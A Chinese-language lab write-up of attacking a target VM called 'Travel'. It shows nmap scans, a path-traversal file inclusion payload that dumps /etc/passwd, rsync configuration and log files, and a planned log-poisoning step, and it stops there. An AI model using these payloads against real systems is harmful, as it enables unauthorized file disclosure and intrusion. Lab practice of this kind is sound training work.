# 靶场搭建

下载:Travel

Nat,IP: 192.168.1.178

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Eline
|_http-server-header: Apache/2.4.56 (Debian)
┌──(root㉿kali)-[~]
└─# nmap -6 -p- -A fe80::20c:29ff:fe8c:cc8d%eth0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 08:12 EDT
Nmap scan report for fe80::20c:29ff:fe8c:cc8d
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
873/tcp open  rsync   (protocol version 31)
MAC Address: 00:0C:29:8C:CC:8D (VMware)

F12 看到目录: http://192.168.1.178/page.php?i=index.html ,文件包含: http://192.168.1.178/page.php?i=....//....//....//etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
PL4GU3:x:1000:1000::/home/PL4GU3:/bin/bash
ethicrash2:x:1001:1001::/home/ethicrash2:/bin/bash
xrdp:x:106:113::/run/xrdp:/usr/sbin/nologin

http://192.168.1.178/page.php?i=....//....//....//etc/rsyncd.conf 查看 873 端口的 rsync 的配置信息

motd file = /etc/Rsyncd.motd
lock file = /var/run/Rsync.lock
log file = /var/log/748e62ababa4f1ce54b8970d08ad3eb0.log
pid file = /var/run/Rsyncd.pid
[rsyncserve]
path = /opt/rsyncserve/
comment = Remote file share.
uid = 0
gid = 0
read only = yes
list = no

再看看日志: http://192.168.1.178/page.php?i=....//....//..../var/log/748e62ababa4f1ce54b8970d08ad3eb0.log

rsync 访问一下,再看看日志,如果有日志信息那么就可以利用

若只,写不进日志,G 了,靶机废了